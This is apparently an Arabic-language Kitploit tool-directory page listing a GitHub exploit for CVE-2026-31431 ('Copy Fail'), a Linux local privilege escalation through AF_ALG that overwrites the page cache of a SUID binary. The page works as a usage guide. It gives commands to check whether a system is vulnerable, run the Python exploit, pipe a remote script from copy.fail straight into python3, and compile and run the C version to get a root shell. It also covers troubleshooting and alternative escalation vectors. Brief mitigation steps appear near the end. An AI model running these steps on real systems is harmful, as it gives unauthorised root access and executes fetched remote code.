Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Copy-Fail-Exploit-CVE-2026-31431 — معظم ثغرات رفع الامتيازات المحلية (LPE) في لينكس تحتاج إلى نافذة سباق (race window) أو إزاحة خاصة بالنواة. Copy Fail هو عيب منطقي مستقيم، لا يحتاج إلى أيٍّ منهما. نفس السكربت بايثون المكوّن من 732 بايت (أو ملف .c elf) يمنح صلاحيات الجذر (root) لكل توزيعة لينكس صدرت منذ عام 2017. | Kitploit
أدوات/GitHubGitHub/painoob/copy-fail-exploit-cve-2026-31431
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقاستغلال الملفات الثنائية
GitHubpainoob/copy-fail-exploit-cve-2026-31431

Copy-Fail-Exploit-CVE-2026-31431

معظم ثغرات رفع الامتيازات المحلية (LPE) في لينكس تحتاج إلى نافذة سباق (race window) أو إزاحة خاصة بالنواة. Copy Fail هو عيب منطقي مستقيم، لا يحتاج إلى أيٍّ منهما. نفس السكربت بايثون المكوّن من 732 بايت (أو ملف .c elf) يمنح صلاحيات الجذر (root) لكل توزيعة لينكس صدرت منذ عام 2017.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1092318منذ 5 أشهرتمت المراجعة من قبل Kitploit

Copy Fail (CVE-2026-31431) – دليل استخدام الاستغلال

⚠️ إخلاء مسؤولية

هذا المحتوى مخصص لأغراض تعليمية واختبارات الأمان المصرح بها فقط. لا تقم بتشغيله على أنظمة دون إذن صريح.


📌 نظرة عامة

Copy Fail (CVE-2026-31431) هي ثغرة تصعيد صلاحيات محلية (LPE) في نظام Linux تؤثر على واجهة برمجة تطبيقات التشفير في النواة عبر AF_ALG.

تسمح لمستخدم غير مميز بالكتابة فوق بيانات ذاكرة التخزين المؤقت للصفحات (page cache) لملف ثنائي SUID (مثل /usr/bin/su) والحصول على صلاحيات الجذر (root).


🧠 المتطلبات

متطلبات النظام

  • نواة Linux (قابلة للاستغلال – تعتمد على حالة التصحيح)
  • تفعيل AF_ALG
  • تحميل وحدة algif_aead

متطلبات استغلال Python

  • Python 3.10+
  • دعم:
    • os.splice
    • socket(AF_ALG)

🔍 التحقق من الثغرة

uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

المؤشرات المتوقعة:

  • authencesn(hmac(sha256),cbc(aes))
  • تحميل algif_aead

🐍 تشغيل استغلال Python

1. التنفيذ المباشر

python3 copy_fail_exp.py

2. أو عبر curl (إذا كان مستضافًا عن بُعد)

curl https://copy.fail/exp | python3

3. تشغيل قشرة الجذر

su
id

النتيجة المتوقعة:

uid=0(root)

⚠️ المشكلات الشائعة (Python)

❌ خطأ: os.splice not found

السبب:

  • إصدار Python أقل من 3.10
  • بناء مقيد

الحل:

  • استخدام ملف Python ثنائي أحدث
  • رفع مترجم Python ثابت

⚙️ تجميع نسخة C

1. التجميع

gcc copy_fail_exp.c -o copy_fail

2. جعله قابلًا للتنفيذ

chmod +x copy_fail

3. تشغيل الاستغلال

./copy_fail
su

⚠️ المشكلات الشائعة (C)

❌ يعمل الاستغلال لكن لا يحصل على الجذر

الأسباب المحتملة:

  • النواة مصححة
  • إزاحات غير صحيحة
  • عدم تطابق البيئة

❌ أخطاء التجميع

قم بتثبيت الأدوات المطلوبة:

apt update && apt install build-essential

🧪 استكشاف الأخطاء وإصلاحها

التحقق مما إذا كان النظام مصححًا

dmesg | grep -i alg

التحقق من الوحدة

lsmod | grep algif_aead

🛡️ التخفيف

تعطيل الوحدة القابلة للاستغلال

echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

تطبيق تصحيح النواة

قم بتحديث نظامك:

apt update && apt upgrade

📌 ملاحظات

  • الاستغلال يعدّل ذاكرة التخزين المؤقت للصفحات فقط (غير دائم)
  • يتطلب وصولًا محليًا
  • غير قابل للاستغلال عن بُعد افتراضيًا

🧠 رؤية نهائية

إذا فشل الاستغلال، ففكر في:

  • النواة مصححة بالفعل
  • قيود البيئة
  • نواقل بديلة لتصعيد الصلاحيات (SUID، capabilities، سوء تكوين sudo)

📚 المراجع

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 ملاحظات المؤلف

استخدم هذا الاستغلال بمسؤولية في المختبرات ومسابقات CTF واختبارات الاختراق المصرح بها فقط.

تنزيل الأداة